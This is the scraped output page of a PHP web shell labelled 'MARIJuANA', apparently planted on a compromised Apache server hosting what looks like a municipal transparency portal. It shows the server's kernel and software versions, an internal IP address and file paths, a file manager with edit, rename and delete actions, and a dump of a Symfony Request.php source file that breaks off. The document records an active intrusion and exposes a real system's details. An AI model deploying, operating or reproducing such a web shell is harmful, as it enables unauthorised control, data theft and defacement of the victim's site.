MARIJuANA
— DIOS — NO — CREA — NADA — EN — VANO —
Linux instance-20230208-1745 6.8.0-1013-oracle #13~22.04.1-Ubuntu SMP Mon Sep 2 13:02:56 UTC 2024 x86_64
  SOFT : Apache/2.4.52 (Ubuntu) PHP : 8.1.2-1ubuntu2.19
/var/www/guajeru/transparencia/assets/ckfinder/core/connector/php/vendor/symfony/http-foundation/
10.0.0.135

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
Exception dir drwxr-xr-x 2021-07-19 12:45 R D
File dir drwxr-xr-x 2021-07-19 12:50 R D
Resources dir drwxr-xr-x 2021-07-19 12:50 R D
Session dir drwxr-xr-x 2021-07-19 12:50 R D
AcceptHeader.php 3.629 KB -rw-r--r-- 2021-07-19 12:41 R E G D
AcceptHeaderItem.php 4.785 KB -rw-r--r-- 2021-07-19 12:41 R E G D
ApacheRequest.php 0.95 KB -rw-r--r-- 2021-07-19 12:41 R E G D
BinaryFileResponse.php 11.937 KB -rw-r--r-- 2021-07-19 12:41 R E G D
CHANGELOG.md 6.833 KB -rw-r--r-- 2021-07-19 12:41 R E G D
Cookie.php 5.061 KB -rw-r--r-- 2021-07-19 12:41 R E G D
ExpressionRequestMatcher.php 1.373 KB -rw-r--r-- 2021-07-19 12:41 R E G D
FileBag.php 4.047 KB -rw-r--r-- 2021-07-19 12:41 R E G D
HeaderBag.php 8.828 KB -rw-r--r-- 2021-07-19 12:41 R E G D
IpUtils.php 4.78 KB -rw-r--r-- 2021-07-19 12:41 R E G D
JsonResponse.php 8.976 KB -rw-r--r-- 2021-07-19 12:41 R E G D
LICENSE 1.059 KB -rw-r--r-- 2021-07-19 12:41 R E G D
ParameterBag.php 8.337 KB -rw-r--r-- 2021-07-19 12:41 R E G D
README.md 0.524 KB -rw-r--r-- 2021-07-19 12:41 R E G D
RedirectResponse.php 2.851 KB -rw-r--r-- 2021-07-19 12:41 R E G D
Request.php 64.302 KB -rw-r--r-- 2021-07-19 12:41 R E G D
RequestMatcher.php 4.526 KB -rw-r--r-- 2021-07-19 12:41 R E G D
RequestMatcherInterface.php 0.697 KB -rw-r--r-- 2021-07-19 12:41 R E G D
RequestStack.php 2.403 KB -rw-r--r-- 2021-07-19 12:41 R E G D
Response.php 35.89 KB -rw-r--r-- 2021-07-19 12:41 R E G D
ResponseHeaderBag.php 8.579 KB -rw-r--r-- 2021-07-19 12:41 R E G D
ServerBag.php 4.238 KB -rw-r--r-- 2021-07-19 12:41 R E G D
StreamedResponse.php 3.382 KB -rw-r--r-- 2021-07-19 12:41 R E G D
composer.json 0.92 KB -rw-r--r-- 2021-07-19 12:41 R E G D
phpunit.xml.dist 0.871 KB -rw-r--r-- 2021-07-19 12:41 R E G D
REQUEST EXIT
* * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\HttpFoundation; use Symfony\Component\HttpFoundation\Exception\ConflictingHeadersException; use Symfony\Component\HttpFoundation\Session\SessionInterface; /** * Request represents an HTTP request. * * The methods dealing with URL accept / return a raw path (% encoded): * * getBasePath * * getBaseUrl * * getPathInfo * * getRequestUri * * getUri * * getUriForPath * * @author Fabien Potencier */ class Request { const HEADER_FORWARDED = 'forwarded'; const HEADER_CLIENT_IP = 'client_ip'; const HEADER_CLIENT_HOST = 'client_host'; const HEADER_CLIENT_PROTO = 'client_proto'; const HEADER_CLIENT_PORT = 'client_port'; const METHOD_HEAD = 'HEAD'; const METHOD_GET = 'GET'; const METHOD_POST = 'POST'; const METHOD_PUT = 'PUT'; const METHOD_PATCH = 'PATCH'; const METHOD_DELETE = 'DELETE'; const METHOD_PURGE = 'PURGE'; const METHOD_OPTIONS = 'OPTIONS'; const METHOD_TRACE = 'TRACE'; const METHOD_CONNECT = 'CONNECT'; /** * @var string[] */ protected static $trustedProxies = array(); /** * @var string[] */ protected static $trustedHostPatterns = array(); /** * @var string[] */ protected static $trustedHosts = array(); /** * Names for headers that can be trusted when * using trusted proxies. * * The FORWARDED header is the standard as of rfc7239. * * The other headers are non-standard, but widely used * by popular reverse proxies (like Apache mod_proxy or Amazon EC2). */ protected static $trustedHeaders = array( self::HEADER_FORWARDED => 'FORWARDED', self::HEADER_CLIENT_IP => 'X_FORWARDED_FOR', self::HEADER_CLIENT_HOST => 'X_FORWARDED_HOST', self::HEADER_CLIENT_PROTO => 'X_FORWARDED_PROTO', self::HEADER_CLIENT_PORT => 'X_FORWARDED_PORT', ); protected static $httpMethodParameterOverride = false; /** * Custom parameters. * * @var \Symfony\Component\HttpFoundation\ParameterBag */ public $attributes; /** * Request body parameters ($_POST). * * @var \Symfony\Component\HttpFoundation\ParameterBag */ public $request; /** * Query string parameters ($_GET). * * @var \Symfony\Component\HttpFoundation\ParameterBag */ public $query; /** * Server and execution environment parameters ($_SERVER). * * @var \Symfony\Component\HttpFoundation\ServerBag */ public $server; /** * Uploaded files ($_FILES). * * @var \Symfony\Component\HttpFoundation\FileBag */ public $files; /** * Cookies ($_COOKIE). * * @var \Symfony\Component\HttpFoundation\ParameterBag */ public $cookies; /** * Headers (taken from the $_SERVER). * * @var \Symfony\Component\HttpFoundation\HeaderBag */ public $headers; /** * @var string|resource|false|null */ protected $content; /** * @var array */ protected $languages; /** * @var array */ protected $charsets; /** * @var array */ protected $encodings; /** * @var array */ protected $acceptableContentTypes; /** * @var string */ protected $pathInfo; /** * @var string */ protected $requestUri; /** * @var string */ protected $baseUrl; /** * @var string */ protected $basePath; /** * @var string */ protected $method; /** * @var string */ protected $format; /** * @var \Symfony\Component\HttpFoundation\Session\SessionInterface */ protected $session; /** * @var string */ protected $locale; /** * @var string */ protected $defaultLocale = 'en'; /** * @var array */ protected static $formats; protected static $requestFactory; /** * @param array $query The GET parameters * @param array $request The POST parameters * @param array $attributes The request attributes (parameters parsed from the PATH_INFO, ...) * @param array $cookies The COOKIE parameters * @param array $files The FILES parameters * @param array $server The SERVER parameters * @param string|resource|null $content The raw body data */ public function __construct(array $query = array(), array $request = array(), array $attributes = array(), array $cookies = array(), array $files = array(), array $server = array(), $content = null) { $this->initialize($query, $request, $attributes, $cookies, $files, $server, $content); } /** * Sets the parameters for this request. * * This method also re-initializes all properties. * * @param array $query The GET parameters * @param array $request The POST parameters * @param array $attributes The request attributes (parameters parsed from the PATH_INFO, ...) * @param array $cookies The COOKIE parameters * @param array $files The FILES parameters * @param array $server The SERVER parameters * @param string|resource|null $content The raw body data */ pu